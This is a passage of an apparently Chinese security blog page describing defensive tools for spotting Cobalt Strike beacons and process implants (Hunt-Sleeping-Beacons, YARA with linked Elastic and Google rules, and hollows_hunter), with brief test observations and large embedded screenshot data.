ImfTqHX5WAADg5b3CvccL52mP12+RVUu54dPaCi2uvJ0ErkHf5ouyx6rpXPqSPdhoiza3N2UvpOzflz9yAADgjhYi7W5kV12F19nmtTtOlC1m11OUlE3s3mKLg8U1WwRL4yLzsim9yhirzX0UHznjDq+tefDej7co5ZgM9kJKb9/kyAEAgJvaMXv8ysYxQEaglV02vf69Sd1GwVJKo4FrjvNZvYqj5cLtXdvFb3jkAADA7Rx3R7RNJe3e69w9sbfxgBwfLHE6Rw4AANzCi+S0ryyYQB6vc0pycrNXHCDeuY4cAAC4uB13RJvMgm50vr5mfhHsxPxK0So1b7Ybyx6f4HrXzaWFfW7krF6127/jsvP7C5y1va935AAAwO0s5LQXb2U0/DGOKCZh5Pz2wmtprsUofa3d4cLOtchhvnRvfLtYNm43XZxa3CzbD/jalcCTpeV9bnSletyrzWNjslri/k0cjfjIWexPfNQVHpObv2G9z5EDAAA3tfspX/FdoBoZt7V43+Pg35LK43Y36+xmSqpKXFrY52zp1wZnNFQyNSCupNZw7fo320seOY2qAgCAE/3x/fX5r3//Zz739coOnrie3W4wO+AlpY/PWXvw+t52ZN52wwEAeDHfX59//8c/3RGtoXcLG+IZy4Mb/abDMYTZAAC8mHtE2mclh98tKV1uLdg2konecFiE2QAAvJ57RNoTZ52UCwZSpIySkWTgYAAA4PXcI9IWWt+dkQQAAN7H7nuPAwAAAAGRNgAAANQk0gYAAIBq/st/+S/3uE4bAAAAru///L/+78dd7ogGAAAA1/df/+t//R///b+ZPQ4AAAB1/I///t/+/o9/irQBAACgjr//459y2gAAAFCNnDYAAADUJKcNAAAANclpAwAAQE1y2gAAAFCTnDYAAADUJKcNAAAANclpAwAAQE1y2gAAAFCTnDYAAADUJKcNAAAANclpAwAAQE1y2gAAAFCTnDYAAADUJKcNAAAANclpAwAAQE1y2gAAAFCTnDYAAADUJKcNAAAANclpAwAAQE1y2gAAAFCTnDYAAADUJKcNAAAANclpAwAAQE1y2gAAAFCTnDYAAADUJKcNAAAANclpAwAAQE1y2gAAAFCTnDYAAADUJKcNAAAANclpAwAAQE1y2gAAAFCTnPZVdF23a1HXdUERAAAAztLntP92djdeXEpI/Hw+95ZdKwIAAMCJ+py2SLuCPiRei37nr3ddlxgqZ0TUcWcu7lKdv1RnoIo7HtV37DMA8M4WctrveUIzTh1Ptj1lQPYOWnqYvVl8sarn89lPL7/dfgxGMthH8dLNvROUbTSSky5d5E23NoHi+I6lD8h1+rxXfDxXrLxF/dVd5C0wl9ixeLXLbt0uJUdsu7Jn9QoANrlO+/GYnZXGl0zPl+6KCoYaupmUsvPX+1Bw8fVHuC0XlBhm7/13smhv2dYjea99RBXpR2x55XPP5/N2ccUpfR5G0pu05IhtV/asXgFACtdp//X9Og6o9uYw01deCyODn+rnPVzMu65lthM7dhFxmL24j0r2YGLZdiM56cAVXKcnKa42LyBFlc+cTbcYiisbH1E3nSJUywGfsRllz+oVACSKrtMOYoBgztXmrMW8mWDDSU9GZDI/BZ+/MvxdMv2srkn8PD4VWGx07Swh4+xhcy9svjIvu6vRiZS4d7wH9+6UxLLVz8Pig/mUvbApr1cp798WPzrM2x03ce5Ixp85LT4Jg2rT2118JR7nx+zdvfatsbhR5X0u/9Z4Ll1Fkvj+XdzYYKyCLSpfWmLtc7LwG3bznCH+fA6WFtYMAIVWn6c9/x5N/Deop/DfuFeb5idzp+iW7K3huaRiD4N/H+FI7jo2ss1P425tM3iY/xtrtxcKa078VKl+2GRXeMzxnNHu2nC
</p>
<h3 id=0x022-hunt-sleeping-beacons>
 0x022 Hunt-Sleeping-Beacons
 <a class=heading-link href=#0x022-hunt-sleeping-beacons>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h3>
<p><a href=https://github.com/thefLink/Hunt-Sleeping-Beacons class=external-link target=_blank rel=noopener>Hunt-Sleeping-Beacons</a>项目的主要功能是帮助广大研究人员在运行时或其他正在运行进程的上下文场景中识别休眠的Beacon</p>
<p>可以看到Hunt-Sleeping-Beacons可以检测出异常的进程，<strong>但是我在实际测试中发现无法对x86进程进行检测</strong></p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<h3 id=0x023-yara>
 0x023 Yara
 <a class=heading-link href=#0x023-yara>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h3>
<p><a href=https://github.com/VirusTotal/yara class=external-link target=_blank rel=noopener>Yara</a>是一个旨在（但不限于）帮助恶意软件研究人员识别和分类恶意软件样本工具</p>
<p><a href=https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar class=external-link target=_blank rel=noopener>Elastic安全公司开源检测CobaltStrike的yara规则</a></p>
<p><a href=https://github.com/chronicle/GCTI class=external-link target=_blank rel=noopener>Google GCTI开源检测CobaltStrike的yara规则</a></p>
<p>使用Elastic的yara规则检测beacon，可以看到命中了6条规则</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>使用-s参数打印出匹配的字符串</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<h3 id=0x024-hollows_hunter>
 0x024 Hollows_Hunter
 <a class=heading-link href=#0x024-hollows_hunter>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h3>
<p><a href=https://github.com/hasherezade/hollows_hunter class=external-link target=_blank rel=noopener>hollows_hunter</a>用于扫描所有正在运行的进程，识别各种潜在的恶意植入物，如替换/植入的PE、shellcode、挂钩（hook）以及内存中的修补程序等</p>
<p>顺带提一嘴，Hollows_Hunter的作者<a href=https://github.com/hasherezade class=external-link target=_blank rel=noopener>Aleksandra Doniec</a>在我看来是一位顶尖的安全研究员，开源了<a href=https://github.com/hasherezade/pe_to_shellcode class=external-link target=_blank rel=noopener>pe_to_shellcode</a>、<a href=https://github.com/hasherezade/process_overwriting class=external-link target=_blank rel=noopener>process_overwriting</a>等优秀的作品，真正左右手互博</p>
<p>通过hollows_hunter可以很轻松的检测到一些异常的进程</p>
<p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABEgAAAILCAIAAAB0BT55AAAgAElEQVR4nO3du5LzPHooav275m4mmNApL2gHK1xhO1vhCvZlTDDhhB3KmVwlX492oPpYbB5egADBg/p5ymV/EoUDAfZvgC9A/vV83G8AAABX9rfb7fbPf/376GoAAACU+9v7/3x/fx9bDwAAgGJ/6/9lbgMAAFxLv7Pmb/HvAAAAzuzv//iP2+32/xxdDQAAgCr/89//ZWJzu91u39/fVuIBAMB17boUbTh56Lpuz6JPZTqJGrVG8INk2nrvIqbZzs79hj+L+/fDev/DTgcA4OrGEZs4dlET2RglPFWEpOu6Y8emNa2xYUu2698z9z4AAB9gPLF5j++Xxp3x0UCfZDiF+OWj2+6P98dRBKD/fnbSFaRtp/tpeCju34/s/cMnwwAADM0sReu67n3nfnbcFh/NNJs2WNszGgRPlz+9a7X2aE6hQdo4eb5hEXumnc3tljflmF2uNpyMBUvmtq1z0lIfTU9h+E1O71eWm7yqy